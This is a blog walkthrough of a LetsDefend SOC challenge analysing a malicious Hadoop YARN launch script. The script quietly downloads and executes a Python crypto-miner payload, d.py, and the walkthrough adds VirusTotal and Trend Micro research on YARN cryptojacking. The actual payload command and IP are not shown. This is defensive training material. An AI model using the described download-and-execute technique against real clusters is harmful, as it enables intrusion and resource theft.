LetsDefend— Bash Script Challenge Walkthrough

Bash Script Analysis Challenge Using Vim and Apache Hadoop Documentation

9 min readDec 2, 2024

Introduction:

Welcome to my weekly walkthrough! If you’ve stumbled across this blog searching for a comprehensive walkthrough of the Bash Script challenge from LetsDefend, you’re in the right place.

In this scenario, our objective is to analyze a suspicious bash script linked to a Hadoop YARN cluster provided by the fictional SOC Team and determine if it’s malicious. For this challenge, we will be using a simple text editor to analyze the script, searching for environment variables set by the script, and comparing them to online documentation. Then, we will analyze a suspicious download command to understand the nature of the attack.

This challenge is beginner-friendly and straightforward, but I had to do a lot of external research to understand Hadoop YARN and the types of threats these services are exposed to. I’ll share this information along the way for some added value. Sounds like fun, right? Let’s get into it!

And hey, if you find this walkthrough helpful — whether it levels-up your skills, gets you over a stumbling block, or serves as a handy reference — please give it a clap! Thanks for reading and going on this investigation with me!

Challenge Link: https://app.letsdefend.io/challenge/log-analysis-with-sysmon

Challenge Scenario:

The SOC team uncovered a suspicious bash script linked to a critical Hadoop YARN cluster that handled large-scale data processing. This script was flagged for further investigation by L1 SOC analysts, who suspected it could be a potential breach. You have been tasked to analyze the bash script to uncover its intent.

Question 1: What is the path set to the standard output log file?

From the scenario, we understand that that we’ll be analyzing a bash script linked to a Hadoop YARN cluster. Hadoop? YARN? These sound like foreign languages to me! To help get us oriented and better interpret the script, let’s get some quick context about these terms in case they’re also unfamiliar to you.

Hadoop: The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models.
Hadoop YARN: Apache Hadoop YARN is the resource management and job scheduling technology in the open source Hadoop distributed processing framework. One of Apache Hadoop’s core components, YARN is responsible for allocating system resources to the various applications running in a Hadoop cluster and scheduling tasks to be executed on different cluster nodes.

While we don’t necessarily need to be Hadoop experts it’s very helpful to understand that YARN is responsible for setting up, managing, and executing tasks for various applications on a cluster of computers.

We can imagine that a bash script might be useful for automating provisioning, setting up environment variables, configuration paths, and executing tasks — but this could also be abused by the bad guys, too. Since we’re told there is something suspicious about the sample script, it might indicate a potential breach of the application container environment. Let’s find out for ourselves!

Now that we have the theory out of the way, let’s finally extract the ChallengeFile, sample.7z, and open the resulting file (sample) with a text editor. For the examples in this walkthrough, I’ll be using Vim.

To find the answer to Question 1, we’ll focus on the PRELAUNCH_OUT environment variable which defines the standard output (stdout) path for the container’s pre-launch logs. As the name implies, these pre-launch logs capture the commands executed by the setup script on the container before the application launches.

Question 2: Which environment variable specifies the Java home directory?

Question 2 is more self-explanatory. A few lines further down in the script, we’ll find the JAVA_HOME environment variable which tells the application where the Java installation’s home directory is.

Question 3: What is the value of the “NM_HTTP_PORT” environment variable?

This is another self-explanatory one. We just need to find the NM_HTTP_PORT environment variable in the script.

Since I’m not familiar with NM, though, let’s do some research to understand it more. According to the Hadoop Documentation, NM stands for NodeManager. It’s a component of YARN that is responsible for managing individual nodes in the cluster. So, this environment variable is specifying the port (8042) where the web interface is accessible to retrieve data about a node’s status. Cool stuff!

Question 4: What directory is set as the “LOCAL_DIRS” environment variable?

For Question 4, let’s find the LOCAL_DIRS environment variable. In the bash script, this variable specifies the local directories on a node where YARN can store temporary files and logs during the execution of applications.

Question 5: The script executes a line at the end of it. What is it?

All right, now we’re done looking for environment variables and starting to analyze some suspicious activity. At the bottom of the script, we’ll see the below command, followed by some parameters:

exec /bin/bash -c

With the use of curl, wget, & lwp-download we get the idea that this command is trying (quietly) a few different methods to download a file from a remote server. For the purposes of Question 5, we must understand what the line at the end of the script is doing. The setback here is that the final command is encoded but that’s no problem!

We can use a tool like CyberChef to decode it, or do it directly from the terminal:

Once we have decoded the command, we’ll ultimately discover that the script downloads and executes a Python-based payload — d.py.

Question 6: Which command is used to create a copy of the launch script?

Let’s take a step back and search the script for a command that creates a copy of the launch script. With little effort, we can find the following line in the script, which is conveniently commented. The copy (cp) command is being used to copy the launch_container.sh script — interesting…

#Creating copy of the launch script
cp "launch_container.sh" "/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/launch_container.sh"

Question 7: What command is executed to determine the directory contents?

Another helpful comment points us to the correct location to look for the answer to Question 7. Here we’ll observe that the ls -l command is used to list the directory contents with the long listing format:

# Determining directory contents
echo "ls -l:" 1>"/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/directory.info"
ls -l 1>>"/root/apps/hadoop-3.2.2/logs/userlogs/application_1617763119642_4002/container_1617763119642_4002_01_000001/directory.info"

Question 8: What IP address is used for downloading a script from the remote server?

We’ve made it to the last question, and it looks familiar, doesn’t it? Remember back in Question 5, we found a script being downloaded and executed. Let’s refer back to that line and the IP Address from where the script was downloaded:

Awesome, we’ve found the answer! Feel free to submit it and wrap up this challenge.

But if you’re interested and want to understand this attack in more detail, I’m going on a side quest to research further by consulting some external threat intelligence to understand exactly is going on.

Question 8 — Side Quest:

While outside the scope of the challenge, if you want to gain a better understanding of the attack, let’s pivot to VirusTotal and search for the IP Address we found.

On VirusTotal, there are a couple of hits, but we want to focus on the Relations tab > Files Referring section. With a quick scan, you’ll notice something familiar from Question 5 — d.py, the payload downloaded and executed by the script.

Clicking on this entry, we’ll see that this is classified as a crypto miner.

Next, let’s head back to the VirusTotal page for the IP Address and navigate to Details > Google Results to find some external research. Check out one of the linked articles from Trend Micro, as it references the malicious IP.

Threat Actors Exploit Misconfigured Apache Hadoop YARN

We look into how threat actors are exploiting Apache Hadoop YARN, a part of the Hadoop framework that is responsible…

www.trendmicro.com

In summary, the report reveals how threat actors exploit misconfigured Apache Hadoop YARN services to deploy cryptojacking miner malware onto their targets.

As cryptojacking malware is known to be one of the dominant and common payloads for Linux environments, it is no surprise that they were deployed in the YARN service as well…
…At the onset of the attack, the threat actors send commands to the exposed service via an HTTP POST request. As an unintended response, the YARN then creates a launch script that incorporates the attackers’ commands.

Between the VirusTotal report for d.py and the TrendMicro research linking the IP we found to cryptojacking attacks, we now have a better understanding of how the malicious script works and the attacker’s goal. Great job!

Conclusion:

There we have it — script analyzed! During our investigation, we analyzed a bash script using Vim. This helped us understand some of the functions and environment variables of Hadoop YARN. We discovered some suspicious commands executed by the script, which included downloading and executing a script from a remote server. By pivoting to external research, we identified indicators of compromise and determined that the attacker likely performed a cryptojacking attack on the server. Now that we have scoped the attack and completed our objectives let’s close out this walkthrough of the Bash Script challenge.

A big thank you to LetsDefend for the fun lab scenario. This was interesting to me because, while the answers were straightforward, I realized I had no context or understanding of what was actually happening in the script. I decided to write this up to learn about Hadoop YARN and interpret the results to shape a theory about the attack, rather than just check answers off a list. I hope that the additional research helped you, too!

Thanks for the support and going through this investigation with me. Remember, if you found this walkthrough helpful don’t forget to give it a clap! Your feedback really is invaluable and helps fuel my commitment to support your journey in the security community. Cybersecurity is a team sport and we’re in this together!

Until next week’s challenge — stay curious and be safe out there!